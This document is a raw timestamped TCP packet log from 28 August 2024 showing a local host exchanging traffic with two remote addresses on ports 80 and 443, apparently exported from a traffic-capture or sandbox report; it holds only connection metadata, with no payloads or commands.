                                                                              Aug 28, 2024 22:29:31.777869940 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:31.778271914 CEST8049169198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:31.778315067 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.128020048 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.132865906 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.132926941 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.133135080 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.138427973 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677210093 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677228928 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677239895 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677289009 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677298069 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677304983 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677309990 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677325010 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677335978 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677337885 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677366972 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677366972 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677391052 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677406073 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677416086 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.677438974 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.677459955 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.681993008 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.685163021 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.685174942 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.685240984 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852179050 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852191925 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852205038 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852241039 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852245092 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852252007 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852263927 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852272034 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852279902 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852514982 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852525949 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852535963 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852546930 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.852559090 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.852570057 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.853070974 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.853091002 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.853101015 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.853121042 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.853130102 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.853142023 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.853152990 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.853179932 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854007006 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854017019 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854032993 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854047060 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854053020 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854059935 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854065895 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854075909 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854090929 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854871035 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854882956 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854892969 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.854927063 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.854938984 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.857075930 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.857125044 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:32.857127905 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:32.857166052 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.001667976 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001681089 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001691103 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001733065 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.001754045 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001764059 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001774073 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001784086 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.001791000 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.001799107 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.001817942 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002063036 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002074003 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002084970 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002094984 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002111912 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002124071 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002130985 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002298117 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002309084 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002315044 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002351046 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002351999 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002365112 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002389908 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002660036 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002711058 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002712011 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002723932 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002743959 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002759933 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002799988 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002810955 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002820015 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002830029 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002841949 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002852917 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002859116 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002891064 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002902031 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002911091 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.002928972 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.002939939 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003484011 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003494024 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003504038 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003526926 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003539085 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003563881 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003576040 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003590107 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003602028 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003607035 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003613949 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003638983 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003639936 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003650904 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003660917 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.003678083 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.003688097 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004200935 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004251003 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004268885 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004278898 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004288912 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004309893 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004318953 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004343033 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004353046 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004363060 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004374027 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004380941 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004391909 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004403114 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.004437923 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004448891 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.004478931 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.007060051 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.007070065 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.007113934 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088470936 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088484049 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088490009 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088495970 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088563919 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088568926 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088574886 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088598013 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088644028 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088659048 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088671923 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088707924 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088711023 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088720083 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088731050 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088745117 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088757038 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088821888 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088834047 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088843107 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088862896 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088877916 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088886976 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088921070 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.088951111 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088964939 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.088995934 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089000940 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089011908 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089023113 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089035988 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089056969 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089214087 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089224100 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089235067 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089250088 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089262009 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089308023 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089320898 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089330912 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089342117 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089349985 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089351892 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089356899 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089370966 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089380026 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089421988 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089458942 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089462996 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089473963 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089504004 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089560032 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089570045 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089581013 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089591980 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089592934 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089605093 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089612007 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089624882 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089636087 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089646101 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089663982 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089673996 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089858055 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089869976 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089879990 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089899063 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089909077 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.089917898 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.089952946 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090246916 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090257883 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090266943 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090286016 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090293884 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090312004 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090323925 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090332985 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090343952 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090349913 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090359926 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090379953 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090529919 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090538979 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090548992 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090560913 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090570927 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090576887 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090581894 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090584993 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090598106 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090604067 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090610027 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090614080 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090621948 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090631962 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090640068 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090642929 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090653896 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090653896 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090667009 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.090677023 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090687990 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.090694904 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.093621016 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093631983 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093641043 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093664885 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.093678951 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093679905 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.093689919 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093699932 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.093718052 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.093739033 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.094778061 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.094810009 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.094819069 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.094820976 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.094841003 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.094852924 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.122070074 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.126904964 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.126950979 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.126951933 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.126971006 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127010107 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.127044916 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127055883 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127065897 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127075911 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127087116 CEST8049170198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:33.127094984 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.127109051 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.127134085 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.129784107 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:33.735743999 CEST4917080192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:36.566740990 CEST8049169198.12.81.228192.168.2.22
                                                                              Aug 28, 2024 22:29:36.566800117 CEST4916980192.168.2.22198.12.81.228
                                                                              Aug 28, 2024 22:29:36.710361004 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:36.710400105 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:36.710450888 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:36.716392040 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:36.716408014 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.325316906 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.325386047 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.480441093 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.480490923 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.480729103 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.601078987 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.648497105 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906553030 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906575918 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906583071 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906600952 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906608105 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906610012 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906627893 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.906651974 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.906661987 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.906696081 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.906982899 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.927870035 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.927877903 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.927908897 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.927922010 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.927928925 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.927946091 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.927951097 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.927983999 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.973851919 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.973881960 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.973905087 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.973912001 CEST44349171207.241.232.154192.168.2.22
                                                                              Aug 28, 2024 22:29:37.973932981 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:37.973932981 CEST49171443192.168.2.22207.241.232.154
                                                                              Aug 28, 2024 22:29:38.014570951 CEST44349171207.241.232.154192.168.2.22
